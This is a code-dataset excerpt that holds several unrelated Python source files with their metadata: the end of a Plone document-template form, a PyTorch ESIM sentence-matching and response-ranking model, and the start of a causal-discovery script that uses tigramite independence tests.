required=True)\n\n\nclass SelectOneOffixxTemplateDocumentWizardStep(Form):\n\n label = _(u'create_document_with_template', default=u'Create document from template')\n ignoreContext = True\n fields = Fields(ICreateDocumentFromOneOffixxTemplate)\n\n def updateWidgets(self, prefix=None):\n super(SelectOneOffixxTemplateDocumentWizardStep, self).updateWidgets(prefix=prefix)\n self.widgets['template_group'].noValueMessage = translate(\n _(u'label_all_template_groups', default=u'All templates'), context=self.request)\n\n def finish_document_creation(self, data):\n new_doc = self.create_document(data)\n self.activate_external_editing(new_doc)\n return self.request.RESPONSE.redirect(new_doc.absolute_url())\n\n def activate_external_editing(self, new_doc):\n \"\"\"Add the oneoffixx external_editor URL to redirector queue.\"\"\"\n new_doc.setup_external_edit_redirect(self.request, action=\"oneoffixx\")\n\n def create_document(self, data):\n \"\"\"Create a new document based on a template.\"\"\"\n command = CreateDocumentFromOneOffixxTemplateCommand(self.context, data['title'], data['template'])\n return command.execute()\n\n @button.buttonAndHandler(_('button_save', default=u'Save'), name='save')\n def handleApply(self, action):\n data, errors = self.extractData()\n\n if not errors:\n return self.finish_document_creation(data)\n\n self.status = self.formErrorsMessage\n return None\n\n @button.buttonAndHandler(_(u'button_cancel', default=u'Cancel'), name='cancel')\n def cancel(self, action):\n return self.request.RESPONSE.redirect(self.context.absolute_url())\n\n\nclass SelectOneOffixxTemplateDocumentView(FormWrapper):\n\n form = SelectOneOffixxTemplateDocumentWizardStep\n", "sub_path": 
"opengever/oneoffixx/browser/form.py", "file_name": "form.py", "file_ext": "py", "file_size_in_byte": 7651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 23, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 35, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 37, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 49, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 54, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 74, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 74, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 83, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 83, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 66, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 66, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 103, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 103, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 97, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 97, "usage_type": "argument"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 117, "usage_type": "name"}, {"api_name": "zope.component.getUtility", "line_number": 120, "usage_type": "call"}, {"api_name": "plone.i18n.normalizer.interfaces.IFileNameNormalizer", "line_number": 120, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 130, "usage_type": "name"}, {"api_name": "plone.supermodel.model.Schema", "line_number": 139, "usage_type": "attribute"}, {"api_name": "plone.supermodel.model", "line_number": 139, "usage_type": "name"}, {"api_name": "zope.schema.Choice", "line_number": 143, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 143, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 144, "usage_type": "call"}, {"api_name": "opengever.base.schema.TableChoice", "line_number": 150, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 151, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 158, "usage_type": "call"}, {"api_name": "zope.schema.TextLine", "line_number": 163, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 163, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 164, "usage_type": "call"}, {"api_name": "z3c.form.form.Form", "line_number": 168, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 170, "usage_type": "call"}, {"api_name": "z3c.form.field.Fields", "line_number": 172, "usage_type": "call"}, {"api_name": "zope.i18n.translate", "line_number": 176, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 177, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.command.CreateDocumentFromOneOffixxTemplateCommand", "line_number": 190, "usage_type": 
"call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 193, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 203, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 203, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 203, "usage_type": "call"}, {"api_name": "plone.z3cform.layout.FormWrapper", "line_number": 208, "usage_type": "name"}]}
+{"seq_id": "125428796", "text": "import pdb\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nsys.path.append(\"..\")\nfrom utils.misc import ixvr\n\nclass AttendFeedForward(nn.Module):\n\t\"\"\"\n\tSimiliar to the attend (Section 3.1) module of the DecAtt paper\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(AttendFeedForward, self).__init__()\n\n\t\tself.hidden_size = hidden_size\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x LB)\n\t\tOutput:\n\t\t\talphas: Soft aligned combinations of s1 w.r.t. s2 tokens (b x maxlen x inp_size)\n\t\t\tbetas: Soft aligned combinations of s2 w.r.t. s1 tokens (b x maxlen x inp_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\th1 = self.linear(s1.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\th2 = self.linear(s2.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\th2t = torch.transpose(h2, 1, 2)\n\t\t# b x hidden_size x LB\n\n\t\te = torch.bmm(h1, h2t)\n\n\t\te_alpha = torch.mul(e, mask1.unsqueeze(-1))\n\t\te_alpha = torch.exp(e_alpha - torch.max(e_alpha, dim=1)[0].unsqueeze(1))\n\t\te_alpha = torch.div(e_alpha, torch.sum(e_alpha, dim=1).unsqueeze(1))\n\t\t# b x LA x LB\n\n\t\te_beta = torch.mul(e, mask2.unsqueeze(1))\n\t\te_beta = torch.exp(e_beta - torch.max(e_beta, dim=2)[0].unsqueeze(-1))\n\t\te_beta = torch.div(e_beta, torch.sum(e_beta, dim=2).unsqueeze(-1))\n\t\t# b x LA x LB\n\n\t\talphas = torch.bmm(torch.transpose(e_alpha, 1, 2), s1)\n\t\talphas = torch.mul(alphas, mask2.unsqueeze(-1))\n\t\t# b x LB x inp_size\n\t\tbetas = torch.bmm(e_beta, s2)\n\t\tbetas = torch.mul(betas, mask1.unsqueeze(-1))\n\t\t# b x LA x inp_size\n\n\t\treturn alphas, betas\n\nclass CompareFeedForward(nn.Module):\n\t\"\"\"\n\tSimilar to the compare (Section 3.2) module of the DecAtt paper\n\texcept instead of returning the sum of the embeddings v1 and v2\n\t(which might be susceptible to the length of the sequence),\n\tthis returns v1_avg, v1_max, v2_avg, v2_max.\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(CompareFeedForward, self).__init__()\n\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size * 2, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, alphas, betas, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\talphas: Aligned phrases (b x LB x inp_size)\n\t\t\tbetas: Aligned phrases (b x LA x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x LB)\n\t\tOutput:\n\t\t\tv1_avg: Comparison avg. pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv1_max: Comparison max. 
pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv2_avg: Comparison avg. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\tv2_max: Comparison max. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\tin1 = torch.cat((s1, betas), dim=2)\n\t\t# b x LA x (inp_size * 2)\n\t\tin2 = torch.cat((s2, alphas), dim=2)\n\t\t# b x LB x (inp_size * 2)\n\n\t\tv1 = self.linear(in1.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\tv1_avg = torch.sum(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)\n\t\tv1_avg = torch.div(v1_avg, torch.sum(mask1, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv1_max = torch.max(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\tv2 = self.linear(in2.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\tv2_avg = torch.sum(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)\n\t\tv2_avg = torch.div(v2_avg, torch.sum(mask2, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv2_max = torch.max(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\treturn v1_avg, v1_max, v2_avg, v2_max\n\nclass ESIMBNMultiTask(nn.Module):\n\t\"\"\"\n\tModel architecture similar to the Enhanced Sequential Inference Model (ESIM)\n\tas described in https://arxiv.org/abs/1609.06038 without the Tree LSTM. This\n\tmodel also has BatchNorm layers for preventing overfitting instead of dropout\n\tlayers.\n\n\tThe BatchNorm order followed here is LIN -> ReLU -> BN even though the original\n\tpaper used BN before the non-linearity. Some online sources claim that BN after\n\tthe ReLU gives better results.\n\n\tThe model is designed for both Reddit response prediction task and Quora\n\tsemantic question matching task.\n\t\"\"\"\n\tdef __init__(self, hidden_size=200, glove_loader=None, pretrained_emb=True):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\thidden_size: Size of the intermediate linear layers\n\t\t\tglove_loader: GLoVe embedding loader\n\t\t\tpretrained_emb: Use pretrained embeddings\n\t\t\"\"\"\n\t\tsuper(ESIMBNMultiTask, self).__init__()\n\n\t\tif not pretrained_emb:\n\t\t\traise NotImplementedError('always loads pretrained embeddings')\n\n\t\tword_vectors = glove_loader.word_vectors\n\t\tword_vectors = np.vstack(word_vectors)\n\t\tvocab_size = word_vectors.shape[0]\n\t\tembed_size = word_vectors.shape[1]\n\n\t\tself.embedding = nn.Embedding(vocab_size, embed_size)\n\t\tself.embedding.load_state_dict({'weight': torch.Tensor(word_vectors)})\n\t\tself.encoder = nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=1, bidirectional=True)\n\t\tself.attend = AttendFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\t\tself.compare = CompareFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\n\t\t# prediction layer for the Quora task\n\t\tself.sts_pred = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 4, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, 2))\n\n\t\t# tranformation layer for the response\n\t\tself.response_transform = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2), \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2))\n\n\t\tself.reset_parameters()\n\n\tdef reset_parameters(self):\n\t\t\"\"\"Initialize network 
weights using Xavier init (with bias 0.01)\"\"\"\n\t\tself.apply(ixvr)\n\n\tdef forward(self, s1, s2, len1, len2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 token indices (b x LA)\n\t\t\ts2: Sentence 2 token indices (b x LB)\n\t\t\tlen1: Sentence 1 length (b)\n\t\t\tlen2: Sentence 2 length (b)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\n\t\ts1 = self.embedding(s1).transpose(0, 1)\n\t\ts1, _ = self.encoder(s1)\n\t\ts1 = torch.transpose(s1, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\ts2 = self.embedding(s2).transpose(0, 1)\n\t\ts2, _ = self.encoder(s2)\n\t\ts2 = torch.transpose(s2, 0, 1).contiguous()\n\t\t# b x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len1.unsqueeze(-1)\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len2.unsqueeze(-1)\n\n\t\tmask1 = mask1.float()\n\t\tmask2 = mask2.float()\n\n\t\talphas, betas = self.attend(s1, s2, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(s1, s2, alphas, betas, mask1, mask2)\n\t\tassert batch_size > 1  # BatchNorm1d layers need more than one sample per batch in training\n\t\tout = self.sts_pred(torch.cat((v1_avg, v1_max, v2_avg, v2_max), dim=1))\n\n\t\treturn out\n\n\tdef rank_responses(self, q, resp, len_q, len_resp):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tq: Reddit question token indices (b x LA)\n\t\t\tresp: Reddit response candidate token indices (b x K x LB)\n\t\t\tlen_q: Length of the input question (b)\n\t\t\tlen_resp: Length of the response candidates (b x K)\n\t\t\"\"\"\n\n\t\tbatch_size = q.shape[0]\n\t\tmaxlen = q.shape[1]\n\t\tK = resp.shape[1]\n\n\t\tq = self.embedding(q).transpose(0, 1)\n\t\tq, _ = self.encoder(q)\n\t\tq = torch.transpose(q, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\tresp = self.embedding(resp).view(batch_size * K, maxlen, -1).transpose(0, 1)\n\t\tresp, _ = self.encoder(resp)\n\t\tresp = torch.transpose(resp, 0, 1).view(batch_size, K, maxlen, -1).contiguous()\n\t\t# b x K x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len_q.unsqueeze(-1)\n\t\tmask1 = mask1.float()\n\t\t# b x LA\n\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size * K, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len_resp.view(-1).unsqueeze(-1)\n\t\tmask2 = mask2.view(batch_size, K, -1).float()\n\t\t# b x K x LB\n\n\t\tq = q.unsqueeze(1).expand(-1, K, -1, -1).contiguous().view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LA x (hidden_size * 2)\n\t\tmask1 = mask1.unsqueeze(1).expand(-1, K, -1).contiguous().view(batch_size * K, maxlen)\n\t\t# (b * K) x LA\n\n\t\tresp = resp.view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LB x (hidden_size * 2)\n\t\tmask2 = mask2.view(batch_size * K, maxlen)\n\t\t# (b * K) x LB\n\n\t\talphas, betas = self.attend(q, resp, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(q, resp, alphas, betas, mask1, mask2)\n\n\t\tv1 = torch.cat((v1_avg, v1_max), dim=1)\n\t\t# (b * K) x (hidden_size * 2)\n\t\tv2 = self.response_transform(torch.cat((v2_avg, v2_max), dim=1))\n\t\t# (b * K) x (hidden_size * 2)\n\n\t\tscores = torch.sum(torch.mul(v1, v2), dim=1).view(batch_size, -1)\n\t\t# b x K\n\n\t\treturn scores\n", "sub_path": "models/ESIMBNMultiTask.py", "file_name": "ESIMBNMultiTask.py", "file_ext": "py", "file_size_in_byte": 9601, 
"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": 
"name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.LSTM", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "utils.misc.ixvr", "line_number": 186, "usage_type": "argument"}, {"api_name": "torch.transpose", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.arange", 
"line_number": 208, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 250, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 257, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 281, "usage_type": "call"}]}
+{"seq_id": "11376249", "text": "import random\nimport torch\nimport torch.nn as nn\nfrom torch import optim\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nimport time\n\nfrom baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests import CMIknn, ParCorr\n\n\nimport itertools\nfrom joblib import Parallel, delayed\n\n# from ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha, window_size, align_pair\n# from ctmi_new import i_ctmi, ctmi\n# from gctmi import gctmi\n\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi_new import ctmi, align_matrix, tmi, gamma_matrix_window_matrix, get_alpha\n# from gctmi import gctmi\n\nfrom datetime import datetime\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n\nclass TestMI:\n def __init__(self, p_value= True):\n self.cd = CMIknn(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, knn=10, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n self.p_value = p_value\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n\n ws_xy = 1\n # y_past = y[:-ws_xy]\n # x = x[ws_xy:]#.reset_index(drop=True)\n # y = y[ws_xy:]#.reset_index(drop=True)\n\n if z is not None:\n # z = z[ws_xy:] # .reset_index(drop=True)\n # z = np.concatenate((z, y_past), axis=1)\n\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n # X = np.concatenate((x, y, y_past), axis=1)\n X = np.concatenate((x, y), axis=1)\n # xyz = np.array([0] * dim_x + [1] * dim_y + [2] * ws_xy)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n if self.p_value:\n pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n return pvalue, value\n else:\n return 0, value\n\n\nclass TestParCorr:\n def __init__(self):\n self.cd = ParCorr(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n if z is not None:\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n X = np.concatenate((x, y), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n # pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n pvalue = 0\n return pvalue, value\n\n\nclass tsCNN(nn.Module):\n def __init__(self, input_size, output_size, input_lag):\n super(tsCNN, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.input_lag = input_lag\n self.compact_ts = nn.Linear(input_lag, 1)\n self.compact_in = nn.Linear(int(input_size/input_lag), 1)\n # self.compact_in = nn.Linear(4, 2)\n self.conv1 = nn.Sequential(\n nn.Conv1d(\n in_channels=1,\n out_channels=input_size, # Some random number\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=2), # 
